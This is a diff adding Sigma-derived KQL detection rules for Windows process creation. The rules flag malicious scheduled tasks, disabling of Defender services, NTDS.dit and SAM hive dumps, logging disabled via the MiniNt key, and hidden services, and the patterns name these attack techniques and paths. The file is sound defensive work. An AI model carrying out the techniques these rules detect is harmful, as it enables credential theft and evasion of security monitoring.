diff --git a/KQL/rules/windows/process_creation/scheduled_task_executing_payload_from_registry.kql b/KQL/rules/windows/process_creation/scheduled_task_executing_payload_from_registry.kql
new file mode 100644
index 00000000..286baa0c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/scheduled_task_executing_payload_from_registry.kql
@@ -0,0 +1,10 @@
+// Title: Scheduled Task Executing Payload from Registry
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-18
+// Level: medium
+// Description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/schtasks_creation_or_modification_with_system_privileges.kql b/KQL/rules/windows/process_creation/schtasks_creation_or_modification_with_system_privileges.kql
new file mode 100644
index 00000000..59754001
--- /dev/null
+++ b/KQL/rules/windows/process_creation/schtasks_creation_or_modification_with_system_privileges.kql
@@ -0,0 +1,10 @@
+// Title: Schtasks Creation Or Modification With SYSTEM Privileges
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-28
+// Level: high
+// Description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " /change " or ProcessCommandLine contains " /create ") and FolderPath endswith "\\schtasks.exe") and ProcessCommandLine contains "/ru " and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ")) and (not(((ProcessCommandLine contains "/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR " or ProcessCommandLine contains ":\\Program Files (x86)\\Avira\\System Speedup\\setup\\avira_speedup_setup.exe" or ProcessCommandLine contains "/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST") or (ProcessCommandLine contains "Subscription Heartbeat" and ProcessCommandLine contains "\\HeartbeatConfig.xml" and ProcessCommandLine contains "\\Microsoft Shared\\OFFICE") or ((ProcessCommandLine contains "/TN TVInstallRestore" and ProcessCommandLine contains "\\TeamViewer_.exe") and FolderPath endswith "\\schtasks.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/schtasks_from_suspicious_folders.kql b/KQL/rules/windows/process_creation/schtasks_from_suspicious_folders.kql
new file mode 100644
index 00000000..8442867e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/schtasks_from_suspicious_folders.kql
@@ -0,0 +1,10 @@
+// Title: Schtasks From Suspicious Folders
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-15
+// Level: high
+// Description: Detects scheduled task creations that have suspicious action command and folder combinations
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "%ProgramData%") and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r ") and ProcessCommandLine contains " /create " and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/screen_capture_activity_via_psr_exe.kql b/KQL/rules/windows/process_creation/screen_capture_activity_via_psr_exe.kql
new file mode 100644
index 00000000..7c7ed0ca
--- /dev/null
+++ b/KQL/rules/windows/process_creation/screen_capture_activity_via_psr_exe.kql
@@ -0,0 +1,10 @@
+// Title: Screen Capture Activity Via Psr.EXE
+// Author: Beyu Denis, oscd.community
+// Date: 2019-10-12
+// Level: medium
+// Description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/start" or ProcessCommandLine contains "-start") and FolderPath endswith "\\Psr.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/script_event_consumer_spawning_process.kql b/KQL/rules/windows/process_creation/script_event_consumer_spawning_process.kql
new file mode 100644
index 00000000..3e9938a2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/script_event_consumer_spawning_process.kql
@@ -0,0 +1,10 @@
+// Title: Script Event Consumer Spawning Process
+// Author: Sittikorn S
+// Date: 2021-06-21
+// Level: high
+// Description: Detects a suspicious child process of Script Event Consumer (scrcons.exe).
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msbuild.exe") and InitiatingProcessFolderPath endswith "\\scrcons.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/script_interpreter_execution_from_suspicious_folder.kql b/KQL/rules/windows/process_creation/script_interpreter_execution_from_suspicious_folder.kql
new file mode 100644
index 00000000..e4b4bf3c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/script_interpreter_execution_from_suspicious_folder.kql
@@ -0,0 +1,10 @@
+// Title: Script Interpreter Execution From Suspicious Folder
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-02-08
+// Level: high
+// Description: Detects a suspicious script execution in temporary folders or folders accessible by environment variables
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -ep bypass " or ProcessCommandLine contains " -ExecutionPolicy bypass " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains "/e:javascript " or ProcessCommandLine contains "/e:Jscript " or ProcessCommandLine contains "/e:vbscript ") or (FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "mshta.exe", "wscript.exe"))) and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\Windows\\Temp") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/scripting_commandline_process_spawned_regsvr32.kql b/KQL/rules/windows/process_creation/scripting_commandline_process_spawned_regsvr32.kql
new file mode 100644
index 00000000..00dc8185
--- /dev/null
+++ b/KQL/rules/windows/process_creation/scripting_commandline_process_spawned_regsvr32.kql
@@ -0,0 +1,13 @@
+// Title: Scripting/CommandLine Process Spawned Regsvr32
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-26
+// Level: medium
+// Description: Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+//   - Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often. Apply additional filter and exclusions as necessary
+//   - Some legitimate Windows services
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\regsvr32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not((ProcessCommandLine endswith " /s C:\\Windows\\System32\\RpcProxy\\RpcProxy.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\cmd.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sdclt_child_processes.kql b/KQL/rules/windows/process_creation/sdclt_child_processes.kql
new file mode 100644
index 00000000..c4078c64
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sdclt_child_processes.kql
@@ -0,0 +1,10 @@
+// Title: Sdclt Child Processes
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\sdclt.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sdiagnhost_calling_suspicious_child_process.kql b/KQL/rules/windows/process_creation/sdiagnhost_calling_suspicious_child_process.kql
new file mode 100644
index 00000000..e078f6f0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sdiagnhost_calling_suspicious_child_process.kql
@@ -0,0 +1,10 @@
+// Title: Sdiagnhost Calling Suspicious Child Process
+// Author: Nextron Systems, @Kostastsale
+// Date: 2022-06-01
+// Level: high
+// Description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1218
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\calc.exe") and InitiatingProcessFolderPath endswith "\\sdiagnhost.exe") and (not(((ProcessCommandLine contains "bits" and FolderPath endswith "\\cmd.exe") or ((ProcessCommandLine endswith "-noprofile -" or ProcessCommandLine endswith "-noprofile") and FolderPath endswith "\\powershell.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/security_event_logging_disabled_via_minint_registry_key_process.kql b/KQL/rules/windows/process_creation/security_event_logging_disabled_via_minint_registry_key_process.kql
new file mode 100644
index 00000000..6d91c21e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/security_event_logging_disabled_via_minint_registry_key_process.kql
@@ -0,0 +1,14 @@
+// Title: Security Event Logging Disabled via MiniNt Registry Key - Process
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-09
+// Level: high
+// Description: Detects attempts to disable security event logging by adding the `MiniNt` registry key.
+// This key is used to disable the Windows Event Log service, which collects and stores event logs from the operating system and applications.
+// Adversaries may want to disable this service to prevent logging of security events that could be used to detect their activities.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1562.002, attack.t1112, car.2022-03-001
+// False Positives:
+//   - Highly Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\MiniNt") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or ((ProcessCommandLine contains "New-Item " or ProcessCommandLine contains "ni ") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\MiniNt" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/security_privileges_enumeration_via_whoami_exe.kql b/KQL/rules/windows/process_creation/security_privileges_enumeration_via_whoami_exe.kql
new file mode 100644
index 00000000..5d816a7e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/security_privileges_enumeration_via_whoami_exe.kql
@@ -0,0 +1,10 @@
+// Title: Security Privileges Enumeration Via Whoami.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-05-05
+// Level: high
+// Description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.discovery, attack.t1033
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /priv" or ProcessCommandLine contains " -priv") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/security_service_disabled_via_reg_exe.kql b/KQL/rules/windows/process_creation/security_service_disabled_via_reg_exe.kql
new file mode 100644
index 00000000..3bb1cf80
--- /dev/null
+++ b/KQL/rules/windows/process_creation/security_service_disabled_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: Security Service Disabled Via Reg.EXE
+// Author: Florian Roth (Nextron Systems), John Lambert (idea), elhoim
+// Date: 2021-07-14
+// Level: high
+// Description: Detects execution of "reg.exe" to disable security services such as Windows Defender.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "\\AppIDSvc" or ProcessCommandLine contains "\\MsMpSvc" or ProcessCommandLine contains "\\NisSrv" or ProcessCommandLine contains "\\SecurityHealthService" or ProcessCommandLine contains "\\Sense" or ProcessCommandLine contains "\\UsoSvc" or ProcessCommandLine contains "\\WdBoot" or ProcessCommandLine contains "\\WdFilter" or ProcessCommandLine contains "\\WdNisDrv" or ProcessCommandLine contains "\\WdNisSvc" or ProcessCommandLine contains "\\WinDefend" or ProcessCommandLine contains "\\wscsvc" or ProcessCommandLine contains "\\wuauserv") and (ProcessCommandLine contains "d 4" and ProcessCommandLine contains "v Start")) and (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/security_tools_keyword_lookup_via_findstr_exe.kql b/KQL/rules/windows/process_creation/security_tools_keyword_lookup_via_findstr_exe.kql
new file mode 100644
index 00000000..260b5bc3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/security_tools_keyword_lookup_via_findstr_exe.kql
@@ -0,0 +1,11 @@
+// Title: Security Tools Keyword Lookup Via Findstr.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2023-10-20
+// Level: medium
+// Description: Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results.
+// This detection focuses on the keywords that the attacker might use as a filter.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith " avira" or ProcessCommandLine endswith " avira\"" or ProcessCommandLine endswith " cb" or ProcessCommandLine endswith " cb\"" or ProcessCommandLine endswith " cylance" or ProcessCommandLine endswith " cylance\"" or ProcessCommandLine endswith " defender" or ProcessCommandLine endswith " defender\"" or ProcessCommandLine endswith " kaspersky" or ProcessCommandLine endswith " kaspersky\"" or ProcessCommandLine endswith " kes" or ProcessCommandLine endswith " kes\"" or ProcessCommandLine endswith " mc" or ProcessCommandLine endswith " mc\"" or ProcessCommandLine endswith " sec" or ProcessCommandLine endswith " sec\"" or ProcessCommandLine endswith " sentinel" or ProcessCommandLine endswith " sentinel\"" or ProcessCommandLine endswith " symantec" or ProcessCommandLine endswith " symantec\"" or ProcessCommandLine endswith " virus" or ProcessCommandLine endswith " virus\"") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql b/KQL/rules/windows/process_creation/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql
new file mode 100644
index 00000000..8f0f371a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql
@@ -0,0 +1,13 @@
+// Title: Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-05
+// Level: high
+// Description: Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations.
+// This behavior has been observed in-the-wild by different threat actors.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Administrators building packages using iexpress.exe
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n ") and (FolderPath endswith "\\iexpress.exe" or ProcessVersionInfoOriginalFileName =~ "IEXPRESS.exe") and (ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sensitive_file_access_via_volume_shadow_copy_backup.kql b/KQL/rules/windows/process_creation/sensitive_file_access_via_volume_shadow_copy_backup.kql
new file mode 100644
index 00000000..fdfbdb41
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sensitive_file_access_via_volume_shadow_copy_backup.kql
@@ -0,0 +1,12 @@
+// Title: Sensitive File Access Via Volume Shadow Copy Backup
+// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
+// Date: 2021-08-09
+// Level: high
+// Description: Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy" and (ProcessCommandLine contains "\\NTDS.dit" or ProcessCommandLine contains "\\SYSTEM" or ProcessCommandLine contains "\\SECURITY")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sensitive_file_dump_via_wbadmin_exe.kql b/KQL/rules/windows/process_creation/sensitive_file_dump_via_wbadmin_exe.kql
new file mode 100644
index 00000000..da17967d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sensitive_file_dump_via_wbadmin_exe.kql
@@ -0,0 +1,13 @@
+// Title: Sensitive File Dump Via Wbadmin.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2024-05-10
+// Level: high
+// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.
+// Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+// False Positives:
+//   - Legitimate backup operation by authorized administrators. Matches must be investigated and allowed on a case by case basis.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "start" or ProcessCommandLine contains "backup") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE") and (ProcessCommandLine contains "\\config\\SAM" or ProcessCommandLine contains "\\config\\SECURITY" or ProcessCommandLine contains "\\config\\SYSTEM" or ProcessCommandLine contains "\\Windows\\NTDS\\NTDS.dit")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql b/KQL/rules/windows/process_creation/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql
new file mode 100644
index 00000000..61a5e691
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql
@@ -0,0 +1,11 @@
+// Title: Sensitive File Recovery From Backup Via Wbadmin.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2024-05-10
+// Level: high
+// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.
+// Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "\\config\\SAM" or ProcessCommandLine contains "\\config\\SECURITY" or ProcessCommandLine contains "\\config\\SYSTEM" or ProcessCommandLine contains "\\Windows\\NTDS\\NTDS.dit") and (ProcessCommandLine contains " recovery" and ProcessCommandLine contains "recoveryTarget" and ProcessCommandLine contains "itemtype:File")) and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/service_dacl_abuse_to_hide_services_via_sc_exe.kql b/KQL/rules/windows/process_creation/service_dacl_abuse_to_hide_services_via_sc_exe.kql
new file mode 100644
index 00000000..c32f37b9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/service_dacl_abuse_to_hide_services_via_sc_exe.kql
@@ -0,0 +1,10 @@
+// Title: Service DACL Abuse To Hide Services Via Sc.EXE
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2021-12-20
+// Level: high
+// Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "DCLCWPDTSD") and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/service_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/service_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..45f4628f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/service_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,13 @@
+// Title: Service Reconnaissance Via Wmic.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-14
+// Level: medium
+// Description: An adversary might use WMI to check if a certain remote service is running on a remote device.
+// When the test completes, a service information will be displayed on the screen if it exists.
+// A common feedback message is that "No instance(s) Available" if the service queried is not running.
+// A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "service" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/service_registry_key_deleted_via_reg_exe.kql b/KQL/rules/windows/process_creation/service_registry_key_deleted_via_reg_exe.kql
new file mode 100644
index 00000000..ad613d73
--- /dev/null
+++ b/KQL/rules/windows/process_creation/service_registry_key_deleted_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: Service Registry Key Deleted Via Reg.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: high
+// Description: Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " delete " and (FolderPath endswith "reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\services\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/service_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/windows/process_creation/service_security_descriptor_tampering_via_sc_exe.kql
new file mode 100644
index 00000000..a6c459f6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/service_security_descriptor_tampering_via_sc_exe.kql
@@ -0,0 +1,10 @@
+// Title: Service Security Descriptor Tampering Via Sc.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-28
+// Level: medium
+// Description: Detection of sc.exe utility adding a new service with special permission which hides that service.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "sdset" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/service_started_stopped_via_wmic_exe.kql b/KQL/rules/windows/process_creation/service_started_stopped_via_wmic_exe.kql
new file mode 100644
index 00000000..91f18f10
--- /dev/null
+++ b/KQL/rules/windows/process_creation/service_started_stopped_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Service Started/Stopped Via Wmic.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects usage of wmic to start or stop a service
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "stopservice" or ProcessCommandLine contains "startservice") and (ProcessCommandLine contains " service " and ProcessCommandLine contains " call ")) and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/service_startuptype_change_via_powershell_set_service.kql b/KQL/rules/windows/process_creation/service_startuptype_change_via_powershell_set_service.kql
new file mode 100644
index 00000000..fbe44881
--- /dev/null
+++ b/KQL/rules/windows/process_creation/service_startuptype_change_via_powershell_set_service.kql
@@ -0,0 +1,12 @@
+// Title: Service StartupType Change Via PowerShell Set-Service
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-04
+// Level: medium
+// Description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - False positives may occur with troubleshooting scripts
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "Disabled" or ProcessCommandLine contains "Manual") and (ProcessCommandLine contains "Set-Service" and ProcessCommandLine contains "-StartupType")) and (FolderPath endswith "\\powershell.exe" or ProcessVersionInfoOriginalFileName =~ "PowerShell.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/service_startuptype_change_via_sc_exe.kql b/KQL/rules/windows/process_creation/service_startuptype_change_via_sc_exe.kql
new file mode 100644
index 00000000..d92aec12
--- /dev/null
+++ b/KQL/rules/windows/process_creation/service_startuptype_change_via_sc_exe.kql
@@ -0,0 +1,12 @@
+// Title: Service StartupType Change Via Sc.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: medium
+// Description: Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - False positives may occur with troubleshooting scripts
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "disabled" or ProcessCommandLine contains "demand") and (ProcessCommandLine contains " config " and ProcessCommandLine contains "start")) and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/set_suspicious_files_as_system_files_using_attrib_exe.kql b/KQL/rules/windows/process_creation/set_suspicious_files_as_system_files_using_attrib_exe.kql
new file mode 100644
index 00000000..30a985e6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/set_suspicious_files_as_system_files_using_attrib_exe.kql
@@ -0,0 +1,10 @@
+// Title: Set Suspicious Files as System Files Using Attrib.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001
+
+DeviceProcessEvents
